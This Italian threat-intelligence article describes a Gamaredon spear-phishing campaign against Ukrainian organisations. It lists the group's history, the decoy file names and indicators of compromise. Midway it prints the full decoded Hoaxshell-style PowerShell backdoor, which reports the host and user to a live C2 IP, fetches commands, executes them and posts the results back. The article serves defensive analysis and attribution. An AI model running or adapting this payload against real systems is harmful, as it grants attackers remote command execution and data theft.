L’APT Russo “Gamaredon” continua a colpire l’Ucraina. Sfrutta la webshell Hoaxshell per attaccare le organizzazioni

Redazione RHC : 19 Febbraio 2023 09:00

Autore: Gianluca Tiepolo

Gamaredon è un APT sponsorizzato dallo stato russo attivo almeno dal 2013. Si ritiene che il gruppo sia responsabile di una serie di attacchi informatici contro obiettivi ucraini, tra cui organizzazioni militari, governative e infrastrutture critiche.

Il Servizio di sicurezza dell’Ucraina classifica il gruppo come APT (Advanced Persistent Threat) e lo identifica inequivocabilmente come un’unità strutturale appositamente creata dal Servizio federale di sicurezza (FSB) della Federazione Russa, il cui compito è di svolgere attività di intelligence e cyber spionaggio contro target ucraini.

Le tattiche, le tecniche e le procedure (TTP) del gruppo sono state ben documentate e spesso coinvolgono l’uso di ingegneria sociale, spear-phishing e malware, tra cui backdoor e strumenti di credential dumping.

Si ritiene che l’obiettivo ultimo del gruppo siano le operazioni di cyber spionaggio.

Di seguito è riportato un elenco di attacchi attribuiti al gruppo Gamaredon nel corso degli anni:

• Intrusioni militari ucraine: nel 2014, il gruppo ha compromesso diverse unità militari ucraine, sottraendo informazioni sensibili e danneggiando le loro attività;
• Attacco al parlamento ucraino: nel 2014, Gamaredon ha compromesso i sistemi informatici del parlamento ucraino, la Verkhovna Rada, e sottratto informazioni sensibili;
• Attacco alla rete elettrica ucraina: nel dicembre 2015, si ritiene che Gamaredon abbia fornito supporto a “Sandworm” in un attacco alla rete elettrica ucraina che ha provocato un blackout che ha colpito oltre 225.000 clienti;
• Intrusione del metrò di Kiev: nel 2016, si ritiene che il gruppo abbia violato i sistemi informatici del metrò di Kiev, il sistema di metropolitana della capitale ucraina, e ha rubato informazioni sensibili;
• Malware Pterodo: nel 2018, il Team di risposta agli incidenti informatici dell’Ucraina (CERT-UA) e il Servizio di intelligence esterna dell’Ucraina hanno rilevato un nuovo ceppo della backdoor “Pterodo” che mirava a colpire i sistemi delle agenzie governative ucraine. L’attacco è stato attribuito a Gamaredon;
• Campagna Covid-19 dell’UE: nel 2019, il gruppo ha sfruttato la pandemia di coronavirus come esca per attirare le vittime ad aprire e-mail e allegati. Queste campagne hanno preso di mira le vittime in paesi europei;
• Intrusioni militari ucraine: secondo la ricerca di SentinelLabs e la telemetria delle vittime del gruppo APT Gamaredon, il gruppo ha compromesso un gran numero di vittime lungo la linea separatista ucraina, colpendo oltre 5,000 organizzazioni Ucraine.

A gennaio 2023 sono stati identificati numerosi attacchi offensivi contro obiettivi in Ucraina riconducibili a Gamaredon, come documentato da Symantec, BlackBerry Research e Trellix. Nel corso delle ultime settimane, è stata identificata una nuova campagna – fino ad ora sconosciuta – condotta da Gamaredon, che ha preso di mira diverse organizzazioni ucraine.

La campagna, parte da un’operazione di spionaggio ancora in corso e mira a diffondere malware sulle macchine delle vittime ucraine e fa ampio uso di script PowerShell e VBScript (VBS) offuscati come parte della catena di infezione.

Il malware distribuito in questa campagna è una “WebShell” che include funzionalità che permettono l’esecuzione di comandi remoti da parte di un attaccante.

Il vettore di attacco consiste in una e-mail di spear-phishing con un allegato: una volta aperto l’allegato, il sistema della vittima verrà compromesso attraverso l’installazione di una web shell.

Come nelle loro precedenti campagne, Gamaredon effettua un targeting estremamente mirato delle vittime. Le mail esca imitano documenti ufficiali di reali organizzazioni governative ucraine, meticolosamente progettate per ingannare persone che hanno ragioni legittime per interagire con tali organizzazioni.

Di seguito un elenco di file associati alla campagna:

• defiant.doc
• defiant.docm
• derivant.xls
• derivant.xlsm

Il naming è coerente con altre campagne di Gamaredon, in cui i file malevoli sono composti da una parola che inizia con la lettera “d” e alcuni sono composti da due parole separate dal simbolo “-“.

Una volta aperto, il documento Word esegue una macro offuscata chiamata “xdm“. Questo script PowerShell decodifica ed esegue un secondo script PowerShell (anch’esso offuscato), che comunica con il server di comando e controllo.

Il primo livello di offuscamento viene ottenuto invertendo il payload codificato in formato Base64. Una volta decodificato il primo payload, il malware rivela un secondo livello di offuscamento ottenuto tramite una serie di tecniche, come la codifica di stringhe, l’offuscamento di comandi e argomenti, la rinominazione di variabili e il packing del codice.

Una volta decodificato, viene eseguito il seguente codice, che rappresenta il cuore della web shell:

powershell -command Start-Process $PSHOME\powershell.exe
-ArgumentList {$s='141.8.197.42:4000';$i='17e9c023-7c9d6f61-48eb357e';
$p='http://';
$v=Invoke-RestMethod -UseBasicParsing -Uri
$p$s/17e9c023/$env:COMPUTERNAME/$env:USERNAME
-Headers @{"Authorization"=$i};
for (;;){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/7c9d6f61
-Headers @{"Authorization"=$i});
if ($c -ne 'None') {$r=Invoke-Expression $c -ErrorAction Stop
-ErrorVariable e;
$r=Out-String -InputObject $r;
$x=Invoke-RestMethod -Uri $p$s/48eb357e -Method POST
-Headers @{"Authorization"=$i}
-Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')}
sleep 0.8}}
-WindowStyle Hidden

L’analisi del codice ha evidenziato delle enormi similitudini con il codice di Hoaxshell, un progetto open-source che implementa una backdoor scritta in PowerShell.

Tale progetto ha raggiunto una discreta popolarità in quanto include tecniche di oscuramento integrate e non viene rilevato dai principali software antivirus.

Probabilmente, questa è la ragione per cui il gruppo Gamaredon ha abusato del progetto in questa campagna; infatti, il documento Word con il payload malevolo basato su Hoaxshell (con alcune modifiche aggiunte da Gamaredon) è stato in grado di bypassare completamente alcune delle soluzioni antivirus più popolari, tra cui Microsoft Defender, Kaspersky, McAfee e SentinelOne.

In questa campagna, una volta ottenuto l’accesso iniziale alla rete della vittima tramite il documento Word malevolo, il gruppo Gamaredon è stato osservato eseguire comandi di ricognizione per poi installare la backdoor “Pterodo” per mantenere la persistenza sul sistema.

Una volta che il gruppo ha ottenuto la persistenza sul bersaglio, gli attaccanti procedono al download di un’altra variante della loro backdoor “Pterodo” e iniziano ad eseguire script aggiuntivi e creare attività pianificate su Windows per essere eseguite periodicamente.

Il fatto che Gamaredon abbia sfruttato un progetto open-source come Hoaxshell non sorprende: il gruppo è stato osservato utilizzare strumenti liberamente disponibili come il Remote Access Trojan (RAT) chiamato “njRAT”, lo strumento di desktop remoto “UltraVNC” e lo scanner di rete “Masscan“.

Questi strumenti off-the-shelf forniscono al gruppo funzionalità di base, come la capacità di controllare a distanza i sistemi compromessi o di scansionare per individuare bersagli vulnerabili.

Gamaredon ha sfruttato esclusivamente ISP russi per i server di comando e controllo in questa campagna, la maggior parte dei quali forniti dalle società IP Server LLC, Hosting technology LTD, TimeWeb LLC e SprintHost LLC.RU.

Nonostante sia stato più volte oggetto di attenzione da parte dei ricercatori di sicurezza, il gruppo Gamaredon persiste nell’utilizzare le stesse tecniche semplicistiche, spesso basandosi su strumenti facilmente disponibili (come Hoaxshell), anche riutilizzando il codice esistente in nuovi attacchi.

Nonostante ciò, il gruppo ha ottenuto notevoli successi nelle loro operazioni e continua a rappresentare una significativa minaccia informatica per l’Ucraina. La catena di attacco del gruppo è caratterizzata dall’ampio utilizzo di documenti Office malevoli, iniezione di template Office malevoli, sfruttamento del protocollo WMI e macro VBA dinamiche.

Dato il particolare focus del gruppo sulle organizzazioni ucraine e l’attuale clima geopolitico, è altamente probabile che Gamaredon continuerà l’attività offensiva nei confronti di questa regione.

Indicatori di compromissione

Domini

• hxxp://f0559838[.]xsph[.]ru
• hxxp://a0728173[.]xsph[.]ru

IP

• 141[.]8[.]197[.]42
• 141[.]8[.]192[.]151

Hash SHA256

• 2AD5A546EAE0FEABADD0D4416EB03CBDA697A25A1F9528C0DCE46CEFA4DC550A (defiant.docm)
• 0724A8DB352E34FC2597974099BF0376D0D31780C0B02E1EDB2BCB5905D852DC (defiant.docm variant)
• D9C89BF2575CEB88BB395FC1E77895A95FE600856A8B0D5EADCD47CF8D066C41 (defiant.docm variant)

Redazione
La redazione di Red Hot Cyber è composta da un insieme di persone fisiche e fonti anonime che collaborano attivamente fornendo informazioni in anteprima e news sulla sicurezza informatica e sull'informatica in generale.

Lista degli articoli